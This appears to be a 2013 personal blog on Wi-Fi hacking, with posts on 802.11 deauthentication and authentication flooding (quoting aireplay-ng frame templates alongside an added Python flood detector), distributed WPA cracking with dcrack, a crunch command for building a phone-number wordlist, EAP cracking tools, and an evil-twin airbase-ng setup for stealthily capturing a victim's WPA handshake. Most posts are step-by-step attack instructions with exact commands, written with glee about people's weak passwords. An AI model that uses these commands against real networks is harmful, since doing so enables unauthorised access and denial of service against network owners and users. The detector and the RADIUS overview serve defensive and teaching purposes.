Wednesday, October 30, 2013

WIRELESS JAMMING !!

What is jamming?

Jamming is any attack that denies service to legitimate users by generating noise, fake protocol packets, or legitimate packets sent with spurious timing. A particular class of Denial of Service (DoS) attacks is also considered jamming. The most trivial way of disrupting a wireless network is to generate continuous high-power noise across the entire bandwidth near the transmitting and/or receiving nodes. The device that generates such noise is called a jammer, and the process is called jamming.
However, jamming can be made more energy efficient and less detectable if the jammer operates using knowledge of the protocol. Jammers that jam the network using knowledge of the protocol are termed protocol-aware jammers.
A wireless signal jammer device can be used to temporarily stop transmission, or to temporarily short out or cut the power of units while they are in use. These include radios, televisions, microwaves, or any unit that depends on received electrical signals to operate.

Is a wireless network secured well enough against jamming?

NO

Since the ratification of the IEEE 802.11i in 2004, organisations have been able to improve security on their wireless networks by making use of CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code protocol). CCMP uses AES (Advanced Encryption Standard) as opposed to the RC4 streaming cipher found in implementations of WEP (Wired Equivalent Privacy) and TKIP (Temporal Key Integrity Protocol). However, the protection offered by 802.11i applies only to data frames and does not provide any protection over the management frames.

Why am I talking about "Management Frames"?

It is these management frames that are insecure and can lead to DoS attacks against an organisation’s wireless network. Unencrypted management frames can disclose important pieces of information to an attacker, including details about the type of wireless equipment in use on the wireless network and configuration settings.

What are Management Frames?

802.11 management frames enable stations to establish and maintain communications. Management packets are used to support authentication, association, and synchronization.

Layer 2 DoS (jamming at Layer 2: protocol-aware jamming)

On an 802.11 network, an attacker can transmit packets using the spoofed source MAC address of an access point. The recipient of these spoofed frames has no way of telling whether they are legitimate or illegitimate requests and will process them. The ability to transmit spoofed management frames allows MAC layer DoS attacks to take place.

Two such MAC layer attacks are:
Authentication/Association flood attack: During an authentication/association flood attack, an attacker uses spoofed source MAC addresses to attempt to authenticate and associate with a target access point. The attacker repeatedly sends authentication/association requests, eventually exhausting the memory and processing capacity of the access point and leaving clients with little or no connection to the wireless network.
Authentication Packet: Authentication packets are sent back and forth between the station requesting authentication and the station to which it is attempting to assert its authentic identity. The number of packets exchanged depends on the authentication method employed. Information relating to the particular scheme is carried in the body of the authentication packet.

The aireplay-ng source code defining the authentication request [Line no. 88 (aireplay-ng.c)]:

#define AUTH_REQ        \
"\xB0\x00\x3A\x01\xBB\xBB\xBB\xBB\xBB\xBB\xCC\xCC\xCC\xCC\xCC\xCC" \
"\xBB\xBB\xBB\xBB\xBB\xBB\xB0\x00\x00\x00\x01\x00\x00\x00"

Function (aireplay-ng.c): do_attack_fake_auth()

Sample code for the "-1" option in aireplay-ng:

        else if(i==1) //attack -1 (open)
        {
            memcpy( h80211, AUTH_REQ, 30 );        // Authentication request template (30 bytes)
            memcpy( h80211 +  4, opt.f_dmac,  6 ); // addr1: receiver address
            memcpy( h80211 + 10, opt.f_smac,  6 ); // addr2: transmitter (source) address
            memcpy( h80211 + 16, opt.f_bssid, 6 ); // addr3: BSSID of the target AP
            opt.f_iswep = 0;                       // no WEP/protected-frame bit
            opt.f_tods = 0; opt.f_fromds = 0;      // Not Leaving DS
            opt.f_minlen = opt.f_maxlen = 30;      // fixed frame length
        }


Tools: Void11, mdk3, aireplay-ng, etc.

Deauthentication/Disassociation flood attack: In a deauthentication/disassociation flood attack, an attacker transmits spoofed frames with the source address of the access point. When clients receive the frames, they disconnect from the network and attempt to reconnect. If the attack is sustained, the clients are unable to maintain a connection to the wireless network. The deauthentication/disassociation flood attack targets one or all users on a specific BSSID (the MAC address of the access point).
Deauthentication Packet: This packet is an announcement stating that the receiver is no longer authenticated. It is a one-way communication from the authenticating station (a BSS or functional equivalent), and must be accepted. It takes effect immediately.

The aireplay-ng source code defining the deauthentication request [Line no. 84 (aireplay-ng.c)]:

#define DEAUTH_REQ      \
"\xC0\x00\x3A\x01\xCC\xCC\xCC\xCC\xCC\xCC\xBB\xBB\xBB\xBB\xBB\xBB" \
"\xBB\xBB\xBB\xBB\xBB\xBB\x00\x00\x07\x00"

Function (aireplay-ng.c): do_attack_deauth()

Sample code for the "-0" option in aireplay-ng:

        if(i==0) //attack -0
        {
            memcpy( h80211, DEAUTH_REQ, 26 );      // Deauthentication template (26 bytes)
            memcpy( h80211 + 16, opt.f_bssid, 6 ); // addr3: BSSID of the AP
            memcpy( h80211 +  4, opt.f_dmac,  6 ); // addr1: receiver (client, or broadcast)
            memcpy( h80211 + 10, opt.f_smac,  6 ); // addr2: transmitter (source) address

            opt.f_iswep = 0;                       // no WEP/protected-frame bit
            opt.f_tods = 0; opt.f_fromds = 0;      // Not Leaving DS
            opt.f_minlen = opt.f_maxlen = 26;      // fixed frame length
        }


Tools: file2air, mdk3, aireplay-ng, etc.
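The two aireplay-ng templates quoted above are also what a wireless IDS has to recognise. The following is an added example (not aireplay-ng code, and not from the original post) that decodes the 802.11 management header and the fixed body fields of the AUTH_REQ and DEAUTH_REQ templates, then runs a per-BSSID sliding-window counter that flags the authentication and deauthentication floods described in this section; the window and threshold values are constructed assumptions.

```python
import struct
from collections import defaultdict, deque

# The two frame templates #defined in aireplay-ng.c and quoted on this page; the
# BB/CC bytes are address placeholders, used here as constructed sample input.
AUTH_REQ = (b"\xB0\x00\x3A\x01\xBB\xBB\xBB\xBB\xBB\xBB\xCC\xCC\xCC\xCC\xCC\xCC"
            b"\xBB\xBB\xBB\xBB\xBB\xBB\xB0\x00\x00\x00\x01\x00\x00\x00")
DEAUTH_REQ = (b"\xC0\x00\x3A\x01\xCC\xCC\xCC\xCC\xCC\xCC\xBB\xBB\xBB\xBB\xBB\xBB"
              b"\xBB\xBB\xBB\xBB\xBB\xBB\x00\x00\x07\x00")
SUBTYPES = {0: "assoc-req", 1: "assoc-resp", 4: "probe-req", 5: "probe-resp",
            8: "beacon", 10: "disassoc", 11: "auth", 12: "deauth"}

def mac(b):
    return ":".join(f"{x:02x}" for x in b)

def parse_mgmt(frame):
    """Decode the 24-byte 802.11 MAC header plus the fixed body fields of
    authentication, deauthentication and disassociation frames."""
    if len(frame) < 24:
        raise ValueError("shorter than an 802.11 MAC header")
    fc0, flags = frame[0], frame[1]
    if (fc0 >> 2) & 0x3 != 0:                     # type bits 00 = management
        raise ValueError("not a management frame")
    subtype = (fc0 >> 4) & 0xF
    info = {
        "subtype": SUBTYPES.get(subtype, f"mgmt-{subtype}"),
        "to_ds": bool(flags & 0x01), "from_ds": bool(flags & 0x02),
        "duration": struct.unpack_from("<H", frame, 2)[0],
        "da": mac(frame[4:10]),       # addr1: receiver    (opt.f_dmac)
        "sa": mac(frame[10:16]),      # addr2: transmitter (opt.f_smac)
        "bssid": mac(frame[16:22]),   # addr3              (opt.f_bssid)
        "seq": struct.unpack_from("<H", frame, 22)[0] >> 4,
    }
    body = frame[24:]
    if subtype == 11 and len(body) >= 6:          # auth: algorithm, seq, status
        info["alg"], info["auth_seq"], info["status"] = struct.unpack_from("<HHH", body)
    elif subtype in (10, 12) and len(body) >= 2:  # disassoc/deauth: reason code
        info["reason"] = struct.unpack_from("<H", body)[0]
    return info

class MgmtFloodDetector:
    """Per-BSSID sliding-window counter of auth and deauth/disassoc frames.
    Window and threshold are constructed defaults, not values from the page."""
    def __init__(self, window_s=1.0, threshold=20):
        self.window_s, self.threshold = window_s, threshold
        self.seen = defaultdict(deque)            # (bssid, kind) -> timestamps

    def feed(self, ts, frame):
        """Return (kind, bssid, count) once a BSSID crosses the threshold."""
        info = parse_mgmt(frame)
        kind = {"auth": "auth", "deauth": "deauth", "disassoc": "deauth"}.get(info["subtype"])
        if kind is None:
            return None
        q = self.seen[(info["bssid"], kind)]
        q.append(ts)
        while q and ts - q[0] > self.window_s:    # expire frames outside the window
            q.popleft()
        return (kind, info["bssid"], len(q)) if len(q) >= self.threshold else None

def scan(frames):
    """frames: iterable of (timestamp_s, bytes). Returns {(kind, bssid): peak count}."""
    det, flagged = MgmtFloodDetector(), {}
    for ts, frame in frames:
        hit = det.feed(ts, frame)
        if hit:
            flagged[hit[:2]] = max(flagged.get(hit[:2], 0), hit[2])
    return flagged
```

Feeding `scan()` the frames of a capture with their timestamps (for example 30 copies of DEAUTH_REQ 20 ms apart) reports the BSSID being flooded, while a single deauth every few seconds is left alone.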

Layer 1 DoS (jamming at Layer 1: RF noise jamming)

A physical layer attack on a wireless network generally requires the attacker to be inside or very close to the target wireless network. Any network that relies on a shared medium is subject to DoS attacks from other devices sharing the same medium. When one device saturates the medium, other clients will find it difficult to communicate.
An attacker using a laptop equipped with a high-output wireless client card and a high-gain antenna can launch a physical medium attack on an organisation's wireless network by generating enough RF noise to reduce the signal-to-noise ratio to an unusable level, saturating the 802.11 frequency bands. The jamming device could also be a custom-built transmitter. For example, a Power Signal Generator (PSG) that is used to test antennas, cables and connectors for wireless devices can be turned into a wireless jamming device when connected to a high-gain antenna.

Wednesday, July 17, 2013

DCRACK - DISTRIBUTED WIRELESS PASSWORD CRACKING


Hello guys,

With the new update to the Aircrack suite, it's now possible to use other systems for processing power.
(I know that CPU cracking is an old-school technique, but this tool is really fun :P)
With the new tool introduced in the Aircrack suite, dcrack has the ability to perform wireless password cracking in a distributed computing environment. Isn't it COOL!! :D

OK then, let's see how we can work with dcrack. (I just tried it now, but I think it's an AWESOME tool!!)



Note: I did not test this in a fully functioning lab; I did the testing on VMware Workstation with 4 OSes running (1 user, 1 server, 2 clients).




STEP 1 - INSTALL AIRCRACK SUITE

Just refer to the aircrack website (http://www.aircrack-ng.org/install.html) for this.


STEP 2 - RUN DCRACK

To run dcrack, you need to know how dcrack works.

As we know now, dcrack utilizes the concept of distributed computing, so dcrack needs three things:


A User

The user requests the server to crack the wireless password for him/her. The user sends the ".cap" file and a dictionary file (wordlist) to the server for cracking.



A Server

The server is used as a command center. All instructions related to cracking are given from here. The server processes the user's request for cracking and passes the instructions to the clients.



Clients

Clients are responsible for doing the dirty work!!
They use their processing power to crack the password using the wordlist given by the user.



To run dcrack, we need to go to the directory where dcrack is located, so in the terminal we'll go to:
/pentest/wireless/aircrack-ng/scripts/

First, the server needs to be started. Run the command below to start the dcrack server.
python dcrack.py server



-------------------------------------------------

NOTE:

DCRACK SERVER IP: 192.168.1.128

CLIENT 1 IP: 192.168.1.131
CLIENT 2 IP: 192.168.1.133
USER IP: 192.168.1.132
MAC ADDR OF THE AP: 00:0d:93:eb:b0:8c
-------------------------------------------------



Second, the user needs to send the .cap file and the wordlist for cracking to the server.
python dcrack.py cmd 192.168.1.128 cap /root/test.cap
python dcrack.py cmd 192.168.1.128 dict /root/password.lst




USER LOG ON SERVER (user sending the files to the server)



NOTE: The wordlist and the .cap file are compressed first to reduce their size before sending them over the network.

Third, both clients (CLIENT 1 and CLIENT 2) need to tell the server that they are available for cracking.
python dcrack.py client 192.168.1.128


CLIENT 1



CLIENT 1 LOG ON SERVER



CLIENT 2



CLIENT 2 LOG ON SERVER


Now, the user needs to send the cracking request to the server:
python dcrack.py cmd 192.168.1.128 crack 00:0d:93:eb:b0:8c





USER LOG ON SERVER


Once the user requests the server for cracking, the clients start downloading the wordlist and the .cap file from the server. The clients then uncompress the files, split the wordlist into 2 parts (as we have 2 clients here), and start cracking using their computing power.


CLIENT 1



CLIENT 2



CLIENT 1 LOG ON SERVER (Client sending the password to the server)



As you can see above, CLIENT 1 found the key from the wordlist.


The user can check the status of the cracking using the command below:

python dcrack.py cmd 192.168.1.128 status







Phew!!
Too long... ha ha :D

That's all guys... I hope you like it.

Thursday, May 16, 2013

EXPERIMENT -- Connecting Alfa card with the "Satellite dish antenna"


Yesterday I was just experimenting with the Alfa card, and the things I found were quite exciting.

I removed the antenna of the Alfa card and connected the Alfa card to my laptop without the antenna to check the networks in the vicinity.



I got only a single network, and that was my home wireless network.



The airodump result:



Signal and Noise Level:




After that I followed these steps:

1. I removed the dish antenna cable connecting to the set-top box.

2. I bound the male-type connector of the satellite dish antenna (the one connecting to the set-top box) to a copper wire (of the kind used in earphones) using a plastic clip.

3. I then bound the other end of the copper wire to the Alfa card's male-type connector.




Now I know it's kind of weird, but after configuring this setup I connected the Alfa card to my laptop, and guess what? I was able to get 3 networks with a high range.





Airodump result:



Signal and Noise Level:



I am still doing some experiments to increase the gain of the antenna.

Tuesday, April 16, 2013

WPA/WPA2 cracking dictionary. Human Stupidity !!


Hi guys,

I have seen so many threads related to WPA cracking using a dictionary, so I thought I should share some of my techniques by which you can increase the chance of getting the WPA/WPA2 password.

In India (I don't know about other countries), I have seen many people using Wi-Fi with WPA/WPA2 encryption enabled, which is actually good. Yes, I know it's hard for a hacker to crack a WPA/WPA2 password when he/she doesn't have a proper dictionary, but there is one thing that many guys forget: the "Human Stupidity" factor :D

People may have secured their Wi-Fi with WPA/WPA2 encryption, but one thing I have noticed so far is that many people choose their own mobile number, or the mobile number of their girlfriend, wife, parents or relatives, as their Wi-Fi password.
We only need to create a dictionary consisting of all the mobile numbers. You think it's hard?

Actually it's kinda easy!! :D :D

Thinking how?

Let's see,

As I said earlier, people choose a mobile number for their password, so we'll create a dictionary containing the mobile numbers.

Now let's say there's a phone number like 9876543211

(there are many series like 99XX, 98XX, 97XX etc.)

We just need to create a dictionary of numbers starting with 9 (for the 9 series of numbers; for the 7 or 8 series you can add 7 or 8 as well), running through every value of the remaining 9 digits while the 1st digit stays fixed.

For creating the dictionary you can use "crunch" (a really nice tool). The total size for all 10-digit numbers (digits 0987654321) is 102GB, but you only need to create a dictionary for 9 digits, as the 1st digit will remain the same, so now the size would be only 10GB.


How to use crunch to create this kind of dictionary?

Let's see then,

First you need to go to the

/pentest/passwords/crunch/ directory

Then you have to type

./crunch 10 10 -t 9%%%%%%%%% -o wordlist.lst

What you're asking crunch to do is create a dictionary with a minimum and maximum length of 10 digits, keep the 1st digit fixed (it will remain the same), vary the other 9 digits accordingly, and finally store the result in a file (in this case wordlist.lst).

The above command will generate a dictionary of 10GB in size, which you can use to crack WPA/WPA2 passwords.

That's all!

Saturday, March 23, 2013

RADIUS Server !!

What is a RADIUS server?
It is a server used to authenticate clients using the RADIUS (Remote Authentication Dial In User Service) client/server protocol. It uses the AAA (Authentication, Authorization, Accounting) concept. RADIUS servers are used by many companies, organizations, universities and especially ISPs. When you dial in to the ISP, you must enter your username and password. This information is passed to a RADIUS server, which checks that the information is correct and then authorizes access to the ISP system. RADIUS uses UDP port 1812 for authentication and port 1813 for accounting.

Why is a RADIUS server used?
RADIUS serves three functions:
1. to authenticate users or devices before granting them access to a network,
2. to authorize those users or devices for certain network services and
3. to account for usage of those services.

RADIUS servers in wireless networks.
A RADIUS server used in a wireless network manages the wireless clients. For wireless, it uses the 802.1X authentication scheme. The big advantage of WPA/WPA2-RADIUS authentication is that the wireless encryption keys are issued by the RADIUS server and are unique to each connection and session. That eliminates distributing a shared key to all users, which might easily be compromised. The RADIUS protocol does not transmit passwords in cleartext between the NAS and the RADIUS server. Rather, a shared secret is used along with the MD5 hashing algorithm to obfuscate passwords.

Difference between WPA-Enterprise and WPA2-Enterprise.
The main difference between WPA-Enterprise and WPA2-Enterprise is the same as that between WPA-Personal and WPA2-Personal, except that in Enterprise mode both need a RADIUS server to authenticate the client.
*NOTE: WPA uses the TKIP cipher with the MD5 hashing algorithm, but WPA2 uses the AES-CCMP cipher with the SHA1 hashing algorithm.
It is mostly recommended to choose WPA2-Enterprise over WPA-Enterprise.

Types of authentication mechanism in a RADIUS server.
There are many authentication mechanisms in a RADIUS server, but the most common and widely used are as follows:
EAP-MD5
LEAP
EAP-TLS
PEAP
EAP-TTLS
EAP-FAST


EAP-MD5
EAP-MD5-Challenge enables a RADIUS server to authenticate a connection request by verifying an MD5 hash of a user's password. The server sends the client a random challenge value, and the client proves its identity by hashing the challenge and its password with MD5. EAP-MD5-Challenge is typically used on trusted networks where the risks of packet sniffing or active attack are fairly low. Because of significant security vulnerabilities, EAP-MD5-Challenge is not usually used on public networks or wireless networks, since third parties can capture packets and apply dictionary attacks to identify password hashes. Because EAP-MD5-Challenge does not provide server authentication, it is vulnerable to spoofing (a third party advertising itself as an access point).
Tool to crack this authentication mechanism : eapmd5pass, eapmd5crack

By default, the EAP-MD5-Challenge password protocol is available for use by the Native and Unix authentication methods.


LEAP (Lightweight Extensible Authentication Protocol)
LEAP was developed by Cisco Systems. LEAP uses a modified version of MS-CHAP (the Microsoft version of the Challenge-Handshake Authentication Protocol), an authentication protocol in which user credentials are not strongly protected and are thus easily compromised.
Tool to crack this authentication mechanism: ASLEAP, THC-leapcracker

Cisco recommends using newer and stronger EAP protocols such as EAP-FAST, PEAP, or EAP-TLS.


EAP-TLS (EAP-Transport Layer Security)
EAP-TLS uses the Transport Layer Security (TLS) protocol. EAP-TLS requires the client to use X.509 certificates. TLS is generally accepted as the most secure, because it depends on certificates. A compromised password is not enough to break into EAP-TLS enabled systems, because the intruder still needs to have the client-side private key (certificate). The highest security available is when client-side keys are housed in "smart cards". This is because there is no way to steal a certificate's corresponding private key from a smart card without stealing the card itself.


PEAP (Protected Extensible Authentication Protocol)
PEAP is similar to EAP-TTLS. It encapsulates EAP within a potentially encrypted and authenticated Transport Layer Security (TLS) tunnel. PEAP requires only a server-side PKI (Public Key Infrastructure) certificate to create a secure TLS tunnel that protects user authentication, and uses server-side public key certificates to authenticate the server. It then creates an encrypted TLS tunnel between the client and the authentication server.
Tool to crack this authentication mechanism: ASLEAP


EAP-TTLS (EAP-Tunneled Transport Layer Security)
EAP-TTLS (Tunneled Transport Layer Security) is designed to provide authentication that is as strong as EAP-TLS, but it does not require that each user be issued a certificate. Instead, only the authentication servers are issued certificates. User authentication is performed by password, but the password credentials are transported in a securely encrypted tunnel established based upon the server certificates. It does not require the client to authenticate to the server with a certificate digitally signed by the CA. The server uses the secure TLS tunnel to authenticate the client with a password and key exchange mechanism. TTLS implementations today support all methods defined by EAP, as well as several older methods (CHAP, PAP, MS-CHAP and MS-CHAPv2).
Tool to crack this authentication mechanism: ASLEAP


EAP-FAST (EAP-Flexible Authentication via Secure Tunneling)
It was designed as a replacement for LEAP. EAP-FAST uses a Protected Access Credential (PAC) to establish a TLS tunnel in which client credentials are verified. When automatic PAC provisioning is enabled, EAP-FAST has a slight vulnerability in that an attacker can intercept the PAC and subsequently use it to compromise user credentials. There is also a vulnerability where an attacker's AP can use the same SSID, reject the user's PAC and supply a new one. Most supplicants can be set to prompt the user, whose credentials are then sent via the inner method to the attacker, who gets either a cleartext password or an MS-CHAPv2 hash that is vulnerable to a dictionary attack.


Reference: Google :D



Sunday, March 3, 2013

ANOTHER EASY WAY TO GET THE WPA HANDSHAKE

Hey guys,

Here's another tutorial of mine on how to get the WPA HANDSHAKE (for cracking WPA encryption) in a VERY EASY WAY!!


PRE-REQUISITES



# You should have a wireless card which supports "PACKET INJECTION".

# Your wireless card should be in monitor mode (recommended).

# Naaaaaa, that's all :P



OK then, let's start...


# Run airodump-ng to start monitoring the air.

airodump-ng mon0

If you have wireless networks in the vicinity, you'll be able to see a list of networks.


# Choose a network for which you want to get the WPA HANDSHAKE.



# After selecting the network, you need the following info from that network:



BSSID (MAC Address of the AP)
ESSID (Name of the AP)
CHANNEL
CIPHER TYPE

# Now open a new terminal and type the following command:

airbase-ng -a <bssid> --essid "<essid>" -c <channel> -F <location> -v -z 4 -V 3 -P -I 10 -C 15 mon0

-a bssid      : set Access Point MAC address
-v            : verbose (print more messages)
-c channel    : sets the channel the AP is running on
-z type       : sets WPA1 cipher tags. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
-Z type       : same as -z, but for WPA2
-V type       : fake EAPOL 1=MD5 2=SHA1 3=auto
-F prefix     : write all sent and received frames into pcap file
-P            : respond to all probes, even when specifying ESSIDs
-I interval   : sets the beacon interval value in ms
-C seconds    : enables beaconing of probed ESSID values (requires -P)

# airbase-ng is a tool used for creating a fake AP. Here, create the fake AP with the same BSSID, ESSID, channel and cipher type as the network you want to get the WPA HANDSHAKE from.

In the above, I used the "-z 4" switch, which says that the network has the CCMP cipher type, and with "-V 3" I am generating fake EAPOL packets.


# Now comes the signal game: if you have a higher signal strength than the other network, then without even deauthenticating the clients, you'll get the WPA HANDSHAKE.


"Here is the best part: the client will not even know that his/her network is under attack :D :D
because we are not deauthenticating him/her from the AP :D :D"


Here you see "Client <client_mac> is associated (WPA1:CCMP) to BSSID: <essid>"

This means that the client has connected to your fake AP and we have just received the WPA handshake (you still need at least 3-4 messages like that to properly get the WPA handshake).

# Now just close it... you're done!! :P


# To check whether we got the WPA handshake or not, run this command:

aircrack-ng <location of the pcap file> -w <wordlist>



As you can see here, I have got a handshake.


That's all...


I hope it's helpful to you all :-)


Thanks for reading!!